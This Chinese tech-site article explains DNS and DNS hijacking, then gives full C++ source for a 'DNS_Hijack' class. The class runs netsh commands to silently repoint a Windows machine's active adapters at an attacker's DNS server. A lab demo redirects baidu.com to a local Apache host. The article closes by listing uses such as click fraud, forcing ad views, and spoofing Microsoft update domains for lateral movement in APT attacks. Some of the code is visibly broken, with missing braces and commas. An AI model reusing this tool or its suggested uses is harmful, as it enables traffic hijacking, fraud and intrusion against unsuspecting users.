为什么总能看到广告弹窗?没错,就是DNS的问题

网络 通信技术
每个IP地址都可以有一个主机名,主机名由一个或多个字符串组成,字符串之间用小数点隔开。有了主机名,就不要死记硬背每台IP设备的IP地址,只要记住相对直观有意义的主机名就行了。这就是DNS协议的功能。

什么是DNS?

每个IP地址都可以有一个主机名,主机名由一个或多个字符串组成,字符串之间用小数点隔开。有了主机名,就不要死记硬背每台IP设备的IP地址,只要记住相对直观有意义的主机名就行了。这就是DNS协议的功能。

主机名到IP地址的映射有两种方式:

1)静态映射,每台设备上都配置主机到IP地址的映射,各设备独立维护自己的映射表,而且只供本设备使用;

2)动态映射,建立一套域名解析系统(DNS),只在专门的DNS服务器上配置主机到IP地址的映射,网络上需要使用主机名通信的设备,首先需要到DNS服务器查询主机所对应的IP地址。

通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。在解析域名时,可以首先采用静态域名解析的方法,如果静态域名解析不成功,再采用动态域名解析的方法。可以将一些常用的域名放入静态域名解析表中,这样可以大大提高域名解析效率

什么是DNS劫持?

DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能访问或访问的是假网址。

DNS(域名系统)的作用是把网络地址(域名,以一个字符串的形式)对应到真实的计算机能够识别的网络地址(IP地址),以便计算机能够进一步通信,传递网址和内容等。由于域名劫持往往只能在特定的被劫持的网络范围内进行,所以在此范围外的域名服务器(DNS)能够返回正常的IP地址,高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持通常相伴的措施——封锁正常DNS的IP。

程序所需头文件和命名空间: 

  1. #include <iostream> 
  2. #include <string> 
  3. #include <windows.h> 
  4. #include <stdlib.h> 
  5. #include <list> 
  6. #include <io.h> 
  7. using namespace std; 

获取本机可用网卡: 

  1. void Get_using_interface() 
  2.       system("netsh interface show interface > interface_info.txt"); 
  3. ​ 
  4.       FILE* fp = fopen("interface_info.txt""rb"); 
  5.       const int file_size = filelength(fileno(fp)); 
  6.       char* buff = (char*)malloc(sizeof(char)*file_size); 
  7.       if (fp) { 
  8.         fread(buff, 1, file_size, fp); 
  9.         str = buff; 
  10.         free(buff); 
  11.         replaceA_to_B(str, "-------------------------------------------------------------------------\r\n"""); 
  12.         Split(str, "\r\n", interface_using); 
  13.         Spilt_space(interface_using); 
  14.       } 
  15.     } 
  16. ​ 
  17. void Spilt_space(list<string> list_str) { 
  18.       for (list<string>::iterator itor = list_str.begin(); itor != list_str.end(); itor++) { 
  19.         cout << *itor << endl; 
  20.         string::size_type first_variable = (*itor).find("已启用"); 
  21.         string::size_type second_variable = (*itor).find("已连接"); 
  22.         string::size_type third_variable = (*itor).find("专用"); 
  23.         if (first_variable != string::npos && second_variable != string::npos && third_variable != string::npos) { 
  24.           string info = *itor; 
  25.           last_get_interface_using.push_back(info.substr(55,info.length())); 
  26.         } 
  27.       } 
  28.     } 
  29. ​ 
  30. void replaceA_to_B(std::string& S, const std::string A, const std::string B) { 
  31.       std::size_t found = S.find(A); 
  32.       while (std::string::npos != found) { 
  33.         S.replace(found, A.length(), B); 
  34.         found = S.find(A, found + 1); 
  35. ​ 
  36. void Split(const string& src, const string& separator, list<string>& dest) 
  37.       string str = src; 
  38.       string substring
  39.       string::size_type start = 0, index
  40.       dest.clear(); 
  41.       index = str.find_first_of(separator, start); 
  42.       do 
  43.       { 
  44.         if (index != string::npos) 
  45.         { 
  46.           substring = str.substr(start, index - start); 
  47.           dest.push_back(substring); 
  48.           start = index + separator.size(); 
  49.           index = str.find(separator, start); 
  50.           if (start == string::npos) break; 
  51.         } 
  52.       } while (index != string::npos); 
  53. ​ 
  54.       //the last part 
  55.       substring = str.substr(start); 
  56.       dest.push_back(substring); 
  57.     } 

构造函数实现: 

  1. DNS_Hijack(string DNS="192.168.1.233"
  2.     { 
  3.       Get_using_interface(); 
  4.       for(list<string>::iterator itor = last_get_interface_using.begin();itor!=last_get_interface_using.end();itor++) 
  5.       { 
  6.         string str = "netsh interface ip set dns \"" + (*itor) + "\" static " + DNS; 
  7.         cout << str; 
  8.         system(str.c_str()); 
  9.       } 
  10.     } 

下面我们先直接给出完整代码方便用户直接运行查看效果。(记得修改ip地址)​ 

  1. ​#include <iostream> 
  2. #include <string> 
  3. #include <windows.h> 
  4. #include <stdlib.h> 
  5. #include <list> 
  6. #include <io.h> 
  7. using namespace std; 
  8. ​ 
  9. class DNS_Hijack { 
  10.   private: 
  11.     list<string> interface_using;          //获取本地可用网卡 
  12.     list<string> last_get_interface_using; 
  13.   private:   
  14.     string str;                //存储文件读取后的内容 
  15.     string DNS; 
  16. ​ 
  17.   private: 
  18.     void Get_using_interface() 
  19.       system("netsh interface show interface > interface_info.txt"); 
  20. ​ 
  21.       FILE* fp = fopen("interface_info.txt""rb"); 
  22.       const int file_size = filelength(fileno(fp)); 
  23.       char* buff = (char*)malloc(sizeof(char)*file_size); 
  24.       if (fp) { 
  25.         fread(buff, 1, file_size, fp); 
  26.         str = buff; 
  27.         free(buff); 
  28.         replaceA_to_B(str, "-------------------------------------------------------------------------\r\n"""); 
  29.         Split(str, "\r\n", interface_using); 
  30.         Spilt_space(interface_using); 
  31.       } 
  32.     } 
  33. ​ 
  34.   private: 
  35.     void Spilt_space(list<string> list_str) { 
  36.       for (list<string>::iterator itor = list_str.begin(); itor != list_str.end(); itor++) { 
  37.         cout << *itor << endl; 
  38.         string::size_type first_variable = (*itor).find("已启用"); 
  39.         string::size_type second_variable = (*itor).find("已连接"); 
  40.         string::size_type third_variable = (*itor).find("专用"); 
  41.         if (first_variable != string::npos && second_variable != string::npos && third_variable != string::npos) { 
  42.           string info = *itor; 
  43.           last_get_interface_using.push_back(info.substr(55,info.length())); 
  44.         } 
  45.       } 
  46. ​ 
  47.     } 
  48. ​ 
  49.   private: 
  50.     void replaceA_to_B(std::string& S, const std::string A, const std::string B) { 
  51.       std::size_t found = S.find(A); 
  52.       while (std::string::npos != found) { 
  53.         S.replace(found, A.length(), B); 
  54.         found = S.find(A, found + 1); 
  55.       } 
  56.   } 
  57. ​ 
  58.   private: 
  59.     void Split(const string& src, const string& separator, list<string>& dest) 
  60.       string str = src; 
  61.       string substring
  62.       string::size_type start = 0, index
  63.       dest.clear(); 
  64.       index = str.find_first_of(separator, start); 
  65.       do 
  66.       { 
  67.         if (index != string::npos) 
  68.         { 
  69.           substring = str.substr(start, index - start); 
  70.           dest.push_back(substring); 
  71.           start = index + separator.size(); 
  72.           index = str.find(separator, start); 
  73.           if (start == string::npos) break; 
  74.         } 
  75.       } while (index != string::npos); 
  76. ​ 
  77.       //the last part 
  78.       substring = str.substr(start); 
  79.       dest.push_back(substring); 
  80.     } 
  81. ​ 
  82.   public
  83.     DNS_Hijack(string DNS="192.168.1.233"
  84.     { 
  85.       Get_using_interface(); 
  86.       for(list<string>::iterator itor = last_get_interface_using.begin();itor!=last_get_interface_using.end();itor++) 
  87.       { 
  88.         string str = "netsh interface ip set dns \"" + (*itor) + "\" static " + DNS; 
  89.         cout << str; 
  90.         system(str.c_str()); 
  91.       } 
  92.     } 
  93. ​ 
  94. }; 
  95. ​ 
  96. int main() 
  97.   DNS_Hijack* one = new DNS_Hijack("192.168.1.20"); 
  98.   system("pause"); 
  99.   return 0; 

现在我在虚拟机win2003,ip地址为:192.168.1.20中搭建了一台DNS服务器,并将所有域名为www.baidu.com的请求都解析到我内网中的一台搭建了Apache服务器上。

这个时候我对www.baidu.com的请求就会通过我内网中的DNS服务器解析成我Apache服务器的地址。

也就是说真正的百度的ip我们已经无法得到,通过nslookup也可以看出,DNS被劫持。

实验效果: 

为什么总能看到广告弹窗?没错,就是DNS的问题

部分用途:

  • 我们可以通过这种方法让用户访问特定的URL从而实现恶意刷取网站PE量的效果。
  • 如果网站接入了广告联盟,可以通过这种方法来让用户直接看到网站中的广告。
  • 营销,推广等。
  • 可以用于局域网横向渗透、提权,在APT攻击中可以有部分体现。(伪造微软的更新服务器域名。) 

 

责任编辑:未丽燕 来源: 今日头条
相关推荐

2021-04-28 22:42:36

SaaS软件技术

2014-01-23 10:07:31

移动广告广告商banner

2017-05-31 15:06:30

2021-02-04 10:12:50

程序员SQLIBM

2021-12-28 16:54:03

2020-09-24 06:41:33

通信IT行业

2014-09-17 14:54:06

2022-06-06 18:25:21

数据泄露互联网

2015-08-21 09:18:17

大数据技术解决问题

2022-12-13 07:30:50

APIweb前端

2023-08-13 19:45:12

DNS

2022-02-10 20:26:06

虚拟元宇宙网络

2020-11-18 13:24:02

广告弹窗网信互联网

2023-08-29 10:09:11

2020-07-17 19:31:19

PythonR编程

2019-07-23 10:40:58

云计算微服务IT

2017-03-29 20:43:32

线上日志磁盘

2009-12-14 18:27:21

Linux操作系统

2021-08-13 22:26:40

Windows 10Windows微软

2019-09-26 09:00:31

Java编程语言
点赞
收藏

51CTO技术栈公众号